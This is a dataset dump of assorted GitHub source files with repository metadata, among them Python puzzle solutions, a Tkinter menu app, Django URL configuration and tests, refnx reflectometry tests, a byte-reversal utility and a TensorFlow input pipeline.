seq_id stringlengths 4 11 | text stringlengths 113 2.92M | repo_name stringlengths 4 125 ⌀ | sub_path stringlengths 3 214 | file_name stringlengths 3 160 | file_ext stringclasses 18
values | file_size_in_byte int64 113 2.92M | program_lang stringclasses 1
value | lang stringclasses 93
values | doc_type stringclasses 1
value | stars int64 0 179k ⌀ | dataset stringclasses 3
values | pt stringclasses 78
values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
35255656510 | ## https://www.hackerrank.com/challenges/py-set-discard-remove-pop/problem
# HackerRank "Set .discard(), .remove() & .pop()" solution.
n = int(input())
s = set(map(int, input().split()))
# Apply the given number of mutation commands to the set.
for _ in range(int(input())):
    tokens = input().split()
    command = tokens[0]
    if command == 'pop':
        s.pop()
    elif command == 'remove':
        s.remove(int(tokens[1]))
    elif command == 'discard':
        s.discard(int(tokens[1]))
print(sum(s))
# n = int(input())
# s = set(map(int, input().split()))
# for i in range(int(input())):
# eval('s.{0}({1})'.format(*input().split()+['']))
# print(sum(s)) | abinesh1/pythonHackerRank | sets/prob30.py | prob30.py | py | 488 | python | en | code | 0 | github-code | 13 |
41839937422 | import os
from Tkinter import *
from tkMessageBox import *
# Main application window for the menu screen.
root=Tk()
root.title("Indian Restaurant")
root.geometry('1367x768')
root.configure(background='Thistle')
# One IntVar per menu item: a checked checkbox stores the item's price
# (its onvalue), an unchecked one stores 0, so summing the vars gives
# the bill total.
v1=IntVar()
v2=IntVar()
v3=IntVar()
v4=IntVar()
v5=IntVar()
v6=IntVar()
v7=IntVar()
v8=IntVar()
v9=IntVar()
v10=IntVar()
#===============Functions=============================================
def _total():
    # Sum of all selected item prices (each IntVar holds the item's
    # price when its checkbox is ticked, 0 otherwise). Factored out of
    # check/order/pay, which previously each repeated this 10-term sum.
    return (v1.get() + v2.get() + v3.get() + v4.get() + v5.get() +
            v6.get() + v7.get() + v8.get() + v9.get() + v10.get())

def check():
    """Display the current bill total, or an error if nothing is selected."""
    total = _total()
    if total == 0:
        showerror('Error','No item is Selected')
    else:
        Label(root,text="Rs.",font="cambria 20 bold").grid(row=10,column=1,sticky=W,padx=40)
        Label(root,text=total,font="times 20 bold").grid(row=10,column=1)

def order():
    """Book the order, or show an error if nothing is selected."""
    if _total() == 0:
        showerror('Error','No item is Selected')
    else:
        showinfo('Success','Order is Booked')

def pay():
    """Complete payment, or show an error if nothing is selected."""
    if _total() == 0:
        showerror('Error','No item is Selected')
    else:
        showinfo('Success','Transaction is Completed. Thank You. Visit Again! :)')

def back():
    """Return to the main restaurant screen and close this window."""
    os.startfile("restaurant.py")
    root.quit()
#===============Labels and Buttons================================
Label(root,text="|| Indian Foods ||",font="Georgia 30 bold",bg="SeaGreen",fg="Gold",width=50,bd=20).grid(row=0,column=0,columnspan=4)
Label(root,text="Select your Food you want to eat?",font="cambria 20 bold",bg="lightblue").grid(row=1,column=0,pady=30,padx=0)
Label(root,text="North India:",font="cambria 20 bold",bg="OrangeRed").grid(row=2,column=0,sticky=W)
Checkbutton(root,text='Kadai Paneer(150)',font="cambria 20 bold",bg="Thistle",variable=v1,onvalue=150).grid(row=3,column=0,sticky='W')
Checkbutton(root,text='Mix Veg(150)',font="cambria 20 bold",bg="Thistle",variable=v2,onvalue=150).grid(row=4,column=0,sticky='W')
Checkbutton(root,text='Butter Panner Masala(200)',font="cambria 20 bold",bg="Thistle",variable=v3,onvalue=200).grid(row=5,column=0,sticky='W')
Checkbutton(root,text='Dum Aloo(100)',font="cambria 20 bold",bg="Thistle",variable=v4,onvalue=100).grid(row=6,column=0,sticky='W')
Checkbutton(root,text='Butter Roti(10)',font="cambria 20 bold",bg="Thistle",variable=v5,onvalue=10).grid(row=7,column=0,sticky='W')
Label(root,text="South India:",font="times 20 bold",bg="OrangeRed").grid(row=2,column=2,sticky=W)
Checkbutton(root,text='Idli & Sambhar(50)',font="cambria 20 bold",bg="Thistle",variable=v6,onvalue=50).grid(row=3,column=2,sticky='W')
Checkbutton(root,text='Uttapam(60)',font="cambria 20 bold",bg="Thistle",variable=v7,onvalue=60).grid(row=4,column=2,sticky='W')
Checkbutton(root,text='Dosa(70)',font="cambria 20 bold",bg="Thistle",variable=v8,onvalue=70).grid(row=5,column=2,sticky='W')
Checkbutton(root,text='Pongal(80)',font="cambria 20 bold",bg="Thistle",variable=v9,onvalue=80).grid(row=6,column=2,sticky='W')
Checkbutton(root,text='Vada(30)',font="cambria 20 bold",bg="Thistle",variable=v10,onvalue=30).grid(row=7,column=2,sticky='W')
Button(root,text="Check Rs.",font="times 20 bold",relief=SUNKEN,bg="black",fg="white",command=check,bd=10).grid(row=9,column=1,sticky=W,pady=30)
Button(root,text="Back",font="times 20 bold",relief=SUNKEN,bg="black",fg="white",command=back,bd=10).grid(row=9,column=0,sticky='W',padx=60,pady=30)
Button(root,text="Order",font="times 20 bold",relief=SUNKEN,bg="black",fg="white",command=order,bd=10).grid(row=9,column=2,sticky='W',pady=30)
Button(root,text="Pay",font="times 20 bold",relief=SUNKEN,bg="black",fg="white",command=pay,bd=10).grid(row=9,column=3,sticky='W',pady=30)
Label(root,text="Total Amount of Indian Food:",font="times 20 bold").grid(row=10,column=0,columnspan=1)
root.mainloop()
| sumiie24/Sumex-Plaza | Files/indian.py | indian.py | py | 4,074 | python | en | code | 0 | github-code | 13 |
5213763415 | #coding=utf-8
#Version: python3.6.0
#Tools: Pycharm 2017.3.2
_author_ = ' Hermione'
# m, n: inclusive bounds of the range to scan for primes.
m,n=map(int,input().split())
cnt=0  # number of primes found
res=0  # running sum of the primes found
def is_primer(num):
    """Return True if num is prime, else False.

    Trial division only needs to test divisors up to sqrt(num): if
    num = a * b with a <= b then a <= sqrt(num). The original scanned
    the full range(2, num) (and its flattened if/else layout risked
    returning True on the first non-divisor).
    """
    if num < 2:
        # 0, 1 and negatives are not prime by definition.
        return False
    for j in range(2, int(num ** 0.5) + 1):
        if num % j == 0:
            return False
    return True
# Count the primes in [m, n] and accumulate their sum.
for i in range(m,n+1):
    if is_primer(i) is True:
        cnt+=1
        res+=i
# Output: "<prime count> <prime sum>"
print("{} {}".format(cnt,res))
# First be clear about the definition of a prime number; note that 1 and 2 are special cases.
| Harryotter/zhedaPTApython | ZheDapython/z4/z4.2.py | z4.2.py | py | 490 | python | en | code | 1 | github-code | 13 |
22232621574 | from django.views.generic import TemplateView
from django.contrib import admin
from django.urls import include, path
from drf_spectacular.views import (
SpectacularAPIView, SpectacularSwaggerView
)
# Project URL routing: admin, the API app, ReDoc docs, Djoser auth
# endpoints and the drf-spectacular OpenAPI schema + Swagger UI.
urlpatterns = [
    path(
        'admin/',
        admin.site.urls
    ),
    path(
        'api/',
        include('api.urls')
    ),
    path(
        'redoc/',
        TemplateView.as_view(template_name='redoc.html'),
        name='redoc'
    ),
    # Djoser endpoints for user management
    path(
        'api/v1/',
        include('djoser.urls')
    ),
    # JWT endpoints, for managing JWT tokens:
    path(
        'api/v1/',
        include('djoser.urls.jwt')
    ),
    # swagger: machine-readable OpenAPI schema consumed by the UI below
    path(
        'api/schema/',
        SpectacularAPIView.as_view(),
        name='schema'
    ),
    # Swagger UI that renders the schema above
    path(
        'api/schema/swagger-ui/',
        SpectacularSwaggerView.as_view(url_name='schema'),
        name='swagger-ui'
    ),
]
| DmitriyEKonovalov/api_final_yatube | yatube_api/yatube_api/urls.py | urls.py | py | 1,063 | python | ru | code | 0 | github-code | 13 |
31195569571 | from pathlib import Path
import os
import pickle
import numpy as np
from refnx.reflect import SLD, Slab, ReflectModel, Motofit
from refnx.dataset import ReflectDataset
from numpy.testing import (
assert_equal,
assert_,
)
class Test__InteractiveModeller:
    """Smoke tests for the refnx Motofit interactive modelling widget,
    exercised against the well-characterised e361 reflectometry dataset."""

    def setup_method(self):
        """Build a ReflectModel for the e361 dataset and load it into a
        fresh Motofit app instance before each test."""
        self.pth = Path(__file__).absolute().parent

        sio2 = SLD(3.47, name="SiO2")
        air = SLD(0, name="air")
        si = SLD(2.07, name="Si")
        d2o = SLD(6.36, name="D2O")
        polymer = SLD(1, name="polymer")

        # Simple air | SiO2 | Si structure (not the one being fitted).
        self.structure = air | sio2(100, 2) | si(0, 3)

        theoretical = np.loadtxt(self.pth / "theoretical.txt")
        qvals, rvals = np.hsplit(theoretical, 2)
        self.qvals = qvals.flatten()
        self.rvals = rvals.flatten()

        # e361 is an older dataset, but well characterised
        self.structure361 = si | sio2(10, 4) | polymer(200, 3) | d2o(0, 3)
        self.model361 = ReflectModel(self.structure361, bkg=2e-5)
        # Let scale and background vary within bounded ranges.
        self.model361.scale.vary = True
        self.model361.bkg.vary = True
        self.model361.scale.range(0.1, 2)
        self.model361.bkg.range(0, 5e-5)

        # d2o
        self.structure361[-1].sld.real.vary = True
        self.structure361[-1].sld.real.range(6, 6.36)

        # SiO2 thickness, polymer thickness and polymer SLD also vary,
        # giving 6 varying parameters in total (checked in test_fit_runs).
        self.structure361[1].thick.vary = True
        self.structure361[1].thick.range(5, 20)
        self.structure361[2].thick.vary = True
        self.structure361[2].thick.range(100, 220)
        self.structure361[2].sld.real.vary = True
        self.structure361[2].sld.real.range(0.2, 1.5)

        self.e361 = ReflectDataset(self.pth / "e361r.txt")
        self.qvals361, self.rvals361, self.evals361 = (
            self.e361.x,
            self.e361.y,
            self.e361.y_err,
        )

        self.app = Motofit()
        self.app(self.e361, model=self.model361)

    def test_run_app(self):
        """The slab views shown by the GUI mirror the model's parameter
        values and vary flags."""
        # figure out it some of the parameters are the same as you set them
        # with
        slab_views = self.app.model_view.structure_view.slab_views
        for slab_view, slab in zip(slab_views, self.structure361):
            assert_equal(slab_view.w_thick.value, slab.thick.value)
            assert_equal(slab_view.w_sld.value, slab.sld.real.value)
            assert_equal(slab_view.w_isld.value, slab.sld.imag.value)
            assert_equal(slab_view.w_rough.value, slab.rough.value)
            assert_equal(slab_view.c_thick.value, slab.thick.vary)
            assert_equal(slab_view.c_sld.value, slab.sld.real.vary)
            assert_equal(slab_view.c_isld.value, slab.sld.imag.vary)
            assert_equal(slab_view.c_rough.value, slab.rough.vary)

    def test_fit_runs(self):
        """A fit launched from the app sees the dataset and the expected
        number of varying parameters, and do_fit completes."""
        parameters = self.app.objective.parameters
        assert_(self.app.dataset is not None)
        assert_(self.app.model.structure[1].thick.vary is True)
        var_params = len(parameters.varying_parameters())
        assert_equal(var_params, 6)

        # sometimes the output buffer gets detached.
        try:
            self.app.do_fit(None)
        except ValueError:
            pass
| refnx/refnx | refnx/reflect/test/test__interactive_modeller.py | test__interactive_modeller.py | py | 3,072 | python | en | code | 31 | github-code | 13 |
15523858223 | from itertools import chain, tee
def format_pdst(func):
    """Decorator: render the matrix of floats returned by *func* as text.

    Each value is formatted with five decimal places; values in a row
    are space-separated and rows are newline-separated (the Rosalind
    PDST output format).
    """
    # Local import keeps the file's top-level import line untouched.
    from functools import wraps

    @wraps(func)  # preserve the wrapped function's name/docstring
    def wrapper(*args, **kwargs):
        matrix = func(*args, **kwargs)
        f_value = lambda x: f"{x:.05f}"
        f_line = lambda x: " ".join(map(f_value, x))
        return "\n".join(map(f_line, matrix))

    return wrapper
@format_pdst
def pdst(data):
    """Build the symmetric p-distance matrix for all sequences in data."""
    sequences = [sequence for _, sequence in gen_seqs(data)]
    return [[p_distance(col, row) for col in sequences] for row in sequences]
def p_distance(s1, s2):
    """Proportion of positions at which s1 and s2 differ (p-distance).

    Assumes the sequences have equal length.
    """
    mismatches = sum(1 for left, right in zip(s1, s2) if left != right)
    return mismatches / len(s1)
def gen_seqs(data):
    """Yield (header_line, concatenated_sequence) pairs from FASTA lines."""
    header_rows = (row for row, line in enumerate(data) if line.startswith(">"))
    # Append a sentinel index one past the end so the final record closes.
    header_rows = chain(header_rows, (len(data),))
    for start, stop in pairwise(header_rows):
        yield data[start], "".join(data[start + 1 : stop])
def pairwise(iterable):
    """s -> (s0, s1), (s1, s2), ... (the classic itertools recipe)."""
    left, right = tee(iterable)
    next(right, None)  # advance the second iterator by one
    return zip(left, right)
DATA_FILE = "dat/rosalind_pdst.txt"
SAMPLE_DATA = """
>Rosalind_9499
TTTCCATTTA
>Rosalind_0942
GATTCATTTC
>Rosalind_6568
TTTCCATTTT
>Rosalind_1833
GTTCCATTTA"""
SAMPLE_OUTPUT = """
0.00000 0.40000 0.10000 0.10000
0.40000 0.00000 0.40000 0.30000
0.10000 0.40000 0.00000 0.20000
0.10000 0.30000 0.20000 0.00000"""
if __name__ == "__main__":
    # Assert sample: sanity-check against the Rosalind sample case.
    SAMPLE_DATA = SAMPLE_DATA.split()
    assert pdst(SAMPLE_DATA) == SAMPLE_OUTPUT.lstrip()
    # Read data: one stripped line per list element.
    with open(DATA_FILE, "r") as f:
        data = [l.strip() for l in f.readlines()]
    # Produce output: the formatted distance matrix.
    print(pdst(data))
| neumann-mlucas/rosalind | src/rosalind_pdst.py | rosalind_pdst.py | py | 1,486 | python | en | code | 0 | github-code | 13 |
39068971110 | from tns_glass.tests import TNSTestCase
from django.core.urlresolvers import reverse
from .models import *
class WetmillTest(TNSTestCase):
def test_unique_sms(self):
self.login(self.admin)
post_data = dict(country = self.rwanda.id,
name = "Musha",
sms_name = 'nasho',
description = "Musha is a better wetmill ever, ha?",
province = self.gitega.id,
year_started = 2009,
coordinates_lat = '-1.56824',
coordinates_lng = '29.35455')
create_url = reverse('wetmills.wetmill_create')
response = self.client.post(create_url, post_data)
self.assertEquals(200, response.status_code)
def test_crudl(self):
self.login(self.admin)
next_url = 'next='+reverse('wetmills.wetmill_create')
pick_country_url = reverse('locales.country_pick') + '?' + next_url
response = self.client.get(pick_country_url)
self.assertIn(response.context['view'].get_context_data()['next'], next_url)
post_data = dict(country=self.rwanda.id)
response = self.client.post(pick_country_url, post_data, follow=True)
self.assertEqual(response.context['form'].initial['country'], self.rwanda)
create_url = reverse('wetmills.wetmill_create')
self.assertEqual(create_url, response.request['PATH_INFO'])
self.assertEqual(self.rwanda, response.context['form'].initial['country'])
# make sure we only list rwanda provences, we shouldn't display any provences in kenya
self.assertNotContains(response, "Kibirira")
post_data = dict(country=self.rwanda.id,
name="Musha",
sms_name='musha',
description="Musha is a better wetmill ever, ha?",
province=self.gitega.id,
year_started=2009,
altitude=1050,
accounting_system='2012',
coordinates_lat='-1,56824',
coordinates_lng='29,35455')
# should fail because cordinates use comma instead of period
response = self.client.post(create_url, post_data)
self.assertTrue('form' in response.context)
self.assertTrue('coordinates' in response.context['form'].errors)
post_data = dict(country=self.rwanda.id,
name="Musha",
sms_name='musha',
description="Musha is a better wetmill ever, ha?",
province=self.gitega.id,
year_started=2009,
altitude=1050,
accounting_system='2012',
coordinates_lat='-1.56824',
coordinates_lng='29.35455')
response = self.client.post(create_url, post_data)
self.assertEquals(302, response.status_code)
wetmill = Wetmill.objects.get(name='Musha')
self.assertEquals("Musha", str(wetmill))
self.assertRedirect(response, reverse('wetmills.wetmill_list'))
update_url = reverse('wetmills.wetmill_update', args=[wetmill.id])
response = self.client.get(update_url)
# assert our provences are only the ones in rwanda
self.assertNotContains(response, "Kibirira")
post_data['name'] = 'Musha2'
post_data['coordinates_lat'] = ''
post_data['coordinates_lng'] = ''
# should fail because there are no coordinates
response = self.client.post(update_url, post_data)
self.assertEquals(200, response.status_code)
self.assertTrue('form' in response.context)
post_data['coordinates_lat'] = '-1,5894'
post_data['coordinates_lng'] = '29,3454'
# should fail because coordinates use comma instead of period
response = self.client.post(update_url, post_data)
self.assertEquals(200, response.status_code)
self.assertTrue('form' in response.context)
post_data['coordinates_lat'] = '-1.5894'
post_data['coordinates_lng'] = '29.3454'
response = self.assertPost(update_url,post_data)
wetmill = Wetmill.objects.get(pk=wetmill.pk)
self.assertEquals('Musha2', wetmill.name)
response = self.client.get(reverse('wetmills.wetmill_list'))
self.assertContains(response, 'Musha2')
def test_crudl_permission(self):
self.login(self.viewer)
# by default, viewer's cannot update wetmills
update_url = reverse('wetmills.wetmill_update', args=[self.nasho.id])
response = self.client.get(update_url)
self.assertRedirect(response, reverse('users.user_login'))
# give the viewer permissions for nasho
from guardian.shortcuts import get_objects_for_user, assign
assign("%s_%s" % ('wetmill', 'wetmill_edit'), self.viewer, self.nasho)
# try again
response = self.client.get(update_url)
self.assertEquals(200, response.status_code)
# shouldn't work for the other wetmill
response = self.client.get(reverse('wetmills.wetmill_update', args=[self.coko.id]))
self.assertRedirect(response, reverse('users.user_login'))
# shouldn't work for creating a wetmills
response = self.client.get(reverse('wetmills.wetmill_create') + "?country=%d" % self.rwanda.id)
self.assertRedirect(response, reverse('users.user_login'))
# unless we give them country level
assign("%s_%s" % ('country', 'wetmill_edit'), self.viewer, self.rwanda)
response = self.client.get(reverse('wetmills.wetmill_update', args=[self.coko.id]))
self.assertEquals(200, response.status_code)
# make sure a post works
post_data = dict(country = self.rwanda.id,
name = "Musha",
sms_name = 'musha',
description = "Musha is a better wetmill ever, ha?",
province = self.gitega.id,
year_started = 2009,
altitude=1050,
accounting_system='2012',
coordinates_lat = '-1.56824',
coordinates_lng = '29.35455')
response = self.client.post(reverse('wetmills.wetmill_update', args=[self.coko.id]), post_data)
self.assertRedirect(response, reverse('public-wetmill', args=[self.coko.id]))
# make sure we can also create a new wetmill
response = self.client.get(reverse('wetmills.wetmill_create') + "?country=%d" % self.rwanda.id)
self.assertEquals(200, response.status_code)
post_data['name'] = "Test"
post_data['sms_name'] = "Test"
response = self.client.post(reverse('wetmills.wetmill_create') + "?country=%d" % self.rwanda.id, post_data)
self.assertRedirect(response, reverse('public-country', args=[self.rwanda.country_code]))
# no dice for kenya though
response = self.client.get(reverse('wetmills.wetmill_update', args=[self.kaguru.id]))
self.assertRedirect(response, reverse('users.user_login'))
def test_ordering(self):
self.login(self.admin)
# clear out existing wetmills, we want to test the order of just the ones
# we create below
Wetmill.objects.all().delete()
rwanda_zaon = Wetmill.objects.create(country=self.rwanda,name='Zaon',sms_name='zaon',description='zaon',province=self.gitega,
year_started=2005, created_by=self.admin, modified_by=self.admin)
kenya_habari = Wetmill.objects.create(country=self.kenya,name='Habari',sms_name='habari',description='habari',province=self.kibirira,
year_started=2005,created_by=self.admin, modified_by=self.admin)
rwanda_biryogo = Wetmill.objects.create(country=self.rwanda,name='Biryogo',sms_name='biryogo',description='biryogo',province=self.bwanacyambwe,
year_started=2005,created_by=self.admin, modified_by=self.admin)
kenya_sanaga = Wetmill.objects.create(country=self.kenya,name='Sanaga',sms_name='sanaga',description='sanaga',province=self.mucoma,
year_started=2005, created_by=self.admin, modified_by=self.admin)
rwanda_abatarutwa = Wetmill.objects.create(country=self.rwanda,name='Abatarutwa',sms_name='abatarutwa',description='abatarutwa',province=self.gitega,
year_started=2005, created_by=self.admin, modified_by=self.admin)
kenya_kelicho = Wetmill.objects.create(country=self.kenya,name='Kelicho',sms_name='kelicho',description='kelicho',province=self.mucoma,
year_started=2005, created_by=self.admin, modified_by=self.admin)
response = self.client.get(reverse('wetmills.wetmill_list'))
wetmills = response.context['wetmill_list']
self.assertEquals(kenya_habari, wetmills[0])
self.assertEquals(kenya_kelicho, wetmills[1])
self.assertEquals(kenya_sanaga, wetmills[2])
self.assertEquals(rwanda_abatarutwa, wetmills[3])
self.assertEquals(rwanda_biryogo, wetmills[4])
self.assertEquals(rwanda_zaon, wetmills[5])
def test_update_csps(self):
self.login(self.admin)
csp_url = reverse('wetmills.wetmill_csps', args=[self.nasho.id])
# shouldn't have a current csp
self.assertEquals(None, self.nasho.current_csp())
response = self.client.get(csp_url)
self.assertEquals(2, len(response.context['form'].fields))
self.assertContains(response, "Rwanda 2009")
self.assertContains(response, "Rwanda 2010")
# associate csp's for both our rwandan seasons
post_data = dict()
post_data['csp__%d' % self.rwanda_2009.id] = self.rtc.id
post_data['csp__%d' % self.rwanda_2010.id] = self.rwacof.id
response = self.assertPost(csp_url, post_data)
# rwacof should be current
self.assertEquals(self.rwacof, self.nasho.current_csp())
# assert our db is in sync
self.assertEquals(self.rtc, self.nasho.get_csp_for_season(self.rwanda_2009))
self.assertEquals(self.rwacof, self.nasho.get_csp_for_season(self.rwanda_2010))
self.assertEquals(None, self.nasho.get_csp_for_season(self.kenya_2011))
# test the initial data when viewing the form again
response = self.client.get(csp_url)
self.assertEquals(self.rtc.id, response.context['form'].initial['csp__%d' % self.rwanda_2009.id])
# now update again, clearing out our 2010 mapping
del post_data['csp__%d' % self.rwanda_2010.id]
response = self.assertPost(csp_url, post_data)
# check the db once more
self.assertEquals(self.rtc, self.nasho.get_csp_for_season(self.rwanda_2009))
self.assertEquals(None, self.nasho.get_csp_for_season(self.rwanda_2010))
self.assertEquals(None, self.nasho.get_csp_for_season(self.kenya_2011))
# we shouldn't have a current csp anymore either
self.assertEquals(None, self.nasho.current_csp())
# test our get method as well
season_csps = self.nasho.get_season_csps()
self.assertEquals(1, len(season_csps))
self.assertEquals(self.rtc, season_csps[0].csp)
self.assertEquals(self.rwanda_2009, season_csps[0].season)
self.assertEquals("Rwanda 2009 - Rwanda Trading Company = Nasho", str(season_csps[0]))
def test_import_views(self):
response = self.client.get(reverse('wetmills.wetmillimport_list'))
self.assertRedirect(response, reverse('users.user_login'))
self.login(self.admin)
response = self.client.get(reverse('wetmills.wetmillimport_list'))
self.assertEquals(200, response.status_code)
create_url = reverse('wetmills.wetmillimport_create')
response = self.client.get(create_url)
f = open(self.build_import_path("wetmill_import.csv"))
post_data = dict(csv_file=f, country=self.rwanda.id)
response = self.assertPost(create_url, post_data)
wm_import = WetmillImport.objects.get()
self.assertEquals('PENDING', wm_import.get_status())
wm_import.import_log = ""
wm_import.save()
wm_import.log("hello world")
wm_import = WetmillImport.objects.get()
self.assertEquals("hello world\n", wm_import.import_log)
response = self.client.get(reverse('wetmills.wetmillimport_read', args=[wm_import.id]))
self.assertContains(response, "PENDING")
response = self.client.get(reverse('wetmills.wetmillimport_list'))
self.assertContains(response, "PENDING")
def build_import_path(self, name):
import os
from django.conf import settings
return os.path.join(settings.TESTFILES_DIR, name)
def test_import(self):
east = Province.objects.create(name="East", country=self.rwanda, order=2, created_by=self.admin, modified_by=self.admin)
west = Province.objects.create(name="West", country=self.rwanda, order=3, created_by=self.admin, modified_by=self.admin)
path = self.build_import_path("wetmill_import.csv")
# clear existing wetmills
Wetmill.objects.all().delete()
wetmills = import_csv_wetmills(self.rwanda, path, self.admin)
self.assertEquals(2, len(wetmills))
nasho = Wetmill.objects.get(name="Nasho")
self.assertEquals("Nasho", nasho.name)
self.assertEquals("East", nasho.province.name)
self.assertEquals("nasho", nasho.sms_name)
self.assertEquals(2010, nasho.year_started)
self.assertDecimalEquals("-1.99", nasho.latitude)
self.assertDecimalEquals("30.02", nasho.longitude)
self.assertEquals(1539, nasho.altitude)
git = Wetmill.objects.get(name="Gitarama")
self.assertEquals("Gitarama", git.name)
self.assertEquals("West", git.province.name)
self.assertEquals("gitarama", git.sms_name)
self.assertIsNone(git.year_started)
self.assertIsNone(git.latitude)
self.assertIsNone(git.longitude)
self.assertIsNone(git.altitude)
# change one of nasho's values
nasho.sms_name = "somethingdiff"
nasho.save()
# import again, should be brought back
wetmills = import_csv_wetmills(self.rwanda, path, self.admin)
nasho = Wetmill.objects.get(name="Nasho")
self.assertEquals("nasho", nasho.sms_name)
def assertBadImport(self, filename, error):
path = self.build_import_path(filename)
try:
reports = import_csv_wetmills(self.rwanda, path, self.admin)
self.fail("Should have thrown error.")
except Exception as e:
self.assertIn(error, str(e))
def test_bad_imports(self):
east = Province.objects.create(name="East", country=self.rwanda, order=2, created_by=self.admin, modified_by=self.admin)
west = Province.objects.create(name="West", country=self.rwanda, order=3, created_by=self.admin, modified_by=self.admin)
self.assertBadImport("wetmill_import_no_name.csv", "Missing name for row")
self.assertBadImport("wetmill_import_no_province.csv", "Missing province for row")
self.assertBadImport("wetmill_import_bad_province.csv", "Unable to find province")
self.assertBadImport("wetmill_import_no_sms.csv", "Missing sms name for")
self.assertBadImport("wetmill_import_bad_header.csv", "CSV file missing the header")
self.assertBadImport("wetmill_import_bad_decimal.csv", "Invalid decimal value")
| TechnoServe/SMSBookkeeping | tns_glass/wetmills/tests.py | tests.py | py | 15,988 | python | en | code | 0 | github-code | 13 |
41767659810 | import sys
def reversebyte(dump, dumpout):
    """Copy the bytes of *dump* into *dumpout* in reverse order.

    dumpout is mutated in place and also returned (the original loop
    added into a caller-supplied zeroed bytearray; slice assignment of
    the reversed slice does the same job at C speed, without the
    pointless manual `i += 1` of the original).
    """
    dumpout[:] = dump[::-1]
    return dumpout
def openfile (s):
    # Misleadingly named: this is an error-exit helper. It writes the
    # message plus a usage line to stderr and terminates the process
    # with exit status 1. Never returns.
    sys.stderr.write(s + "\n")
    sys.stderr.write("Usage: %s <infile> <outfile>\n" % sys.argv[0])
    sys.exit(1)
if __name__ == '__main__':
    # Usage: reversebyte.py <infile> <outfile>
    if len(sys.argv) != 3:
        openfile("invalid argument count")
    infile, outfile = sys.argv[1], sys.argv[2]
    # `with` guarantees the file handles are closed even on error
    # (the original left both files open if an exception occurred).
    with open(infile, "rb") as src:
        dump = bytearray(src.read())
    dumpout = bytearray(len(dump))
    outdump = reversebyte(dump, dumpout)
    with open(outfile, "wb") as dst:
        dst.write(outdump)
| DmitryMeD/Small_RE_tools | reversebyte.py | reversebyte.py | py | 694 | python | en | code | 2 | github-code | 13 |
4415839575 | from random import choice
class MorphemeGeneratorMixin:
    """Mixin that generates unique CV-pattern syllables as morphemes.

    Expects the host class to provide:
      - self.phonological_inventory: dict with 'C' and 'V' phoneme sequences
      - self.inventory: dict holding a 'V' vowel collection plus
        'max_CV' / 'max_CVC' / 'max_CVV' / 'max_CVCV' caps; generated
        morphemes are stored here under their label
      - self.syllables: set of syllables already in use
    """

    def map_syll_to_structure(self, syll):
        """Classify a syllable as 'CV', 'CVCV', 'CVV' or 'CVC'.

        Length 2 -> CV, length 4 -> CVCV; for length 3 the syllable is
        CVV when its last segment is a vowel (per self.inventory['V']),
        otherwise CVC.
        """
        if len(syll) == 2:
            return 'CV'
        elif len(syll) == 4:
            return 'CVCV'
        else:
            if syll[-1] in self.inventory['V']:
                return 'CVV'
            else:
                return 'CVC'

    def get_more_complex_syllable(self, syll):
        """Return the structure one step above syll's on the complexity
        hierarchy CV < CVC < CVV < CVCV, wrapping back to CV at the top.

        A falsy syll yields the simplest structure, 'CV'.
        """
        if not syll:
            return 'CV'
        structure = self.map_syll_to_structure(syll)
        hierarchy = ['CV', 'CVC', 'CVV', 'CVCV']
        try:
            return hierarchy[hierarchy.index(structure) + 1]
        except IndexError:
            return hierarchy[0]

    def gen_morpheme(self, label, syll_structure='CV', noop=False):
        """Generate a fresh (unused) syllable and store it under *label*.

        Draws random phonemes for the requested structure until an unused
        syllable appears; once the cap for that structure
        (self.inventory['max_<STRUCTURE>']) is reached, escalates to the
        next structure in the complexity hierarchy and retries.

        NOTE(review): `noop` seeds syll with '' instead of None, but ''
        is falsy so generation still runs — the flag appears ineffective;
        confirm intended semantics before relying on it.
        """
        hierarchy = ['CV', 'CVC', 'CVV', 'CVCV']
        templates = {'CV': '{c1}{v1}', 'CVC': '{c1}{v1}{c2}',
                     'CVV': '{c1}{v1}{v2}', 'CVCV': '{c1}{v1}{c2}{v2}'}
        # BUG FIX: the original used .capitalize(), which lowercases the
        # tail ('CV' -> 'Cv') and made every templates[structure] lookup
        # raise KeyError. .upper() keeps the lookup keys valid while
        # remaining case-insensitive for callers.
        structure = syll_structure.upper()
        if noop:
            syll = ''
        else:
            syll = None
        template = templates[structure]
        while (not syll) or syll in self.syllables:
            if len(self.syllables) < self.inventory['max_{}'.format(structure)]:
                syll = template.format(c1=choice(self.phonological_inventory['C']),
                                       v1=choice(self.phonological_inventory['V']),
                                       c2=choice(self.phonological_inventory['C']),
                                       v2=choice(self.phonological_inventory['V']))
            else:
                # BUG FIX: the original assigned the *structure name*
                # returned by get_more_complex_syllable to `template`, so
                # subsequent .format() calls yielded the literal structure
                # string. Escalate the structure and look up its template.
                structure = hierarchy[(hierarchy.index(structure) + 1) % len(hierarchy)]
                template = templates[structure]
        self.syllables.add(syll)
        self.inventory[label] = syll
34141178752 | import pandas as pd
import numpy as np
import tensorflow as tf
from simple_transformer import TransformerBlock, TokenEmbedding
from biom import load_table
from tensorflow import keras
from keras.layers import MultiHeadAttention, LayerNormalization, Dropout, Layer
from keras.layers import Embedding, Input, GlobalAveragePooling1D, Dense
from keras.models import Sequential, Model
# Save table #
table_path = 'unifrac-dataset/training/data/filtered-merged.biom'
table = load_table(table_path)
vocab = table.shape[0]
MAX_OBS_PER_SAMPLE=int(np.max(table.pa(inplace=False).sum(axis='sample')))
print(MAX_OBS_PER_SAMPLE)
BATCH_SIZE=16
def process_input(line):
    """Parse a batch of tab-separated training lines into model inputs.

    Each line holds: a float UniFrac distance, then four comma-separated
    integer lists (sample-1 obs ids, sample-1 counts, sample-2 obs ids,
    sample-2 counts). Returns ((s1_obs, s1_count, s2_obs, s2_count),
    distance) with each tensor shaped (BATCH_SIZE, MAX_OBS_PER_SAMPLE).
    Counts are normalized so each sample's depth sums to 1.
    """
    # load data from files
    defs = [float()] + [str()]*4
    fields = tf.io.decode_csv(line, record_defaults=defs, field_delim='\t')
    distance = fields[0]
    table_info = tf.strings.split(fields[1:], sep=',')
    table_info = tf.strings.to_number(table_info, out_type=tf.dtypes.int32)

    # make batch index come first: (4, B, M) -> (B, 4, M); ragged rows are
    # zero-padded out to MAX_OBS_PER_SAMPLE by to_tensor.
    table_info = table_info.to_tensor(shape=(4, BATCH_SIZE, MAX_OBS_PER_SAMPLE))
    table_info = tf.transpose(table_info, perm=[1,0,2])

    # normalize the table so that sample depths sum to 1
    s1_obs, s1_count, s2_obs, s2_count = tf.split(table_info, num_or_size_splits=4, axis=1)
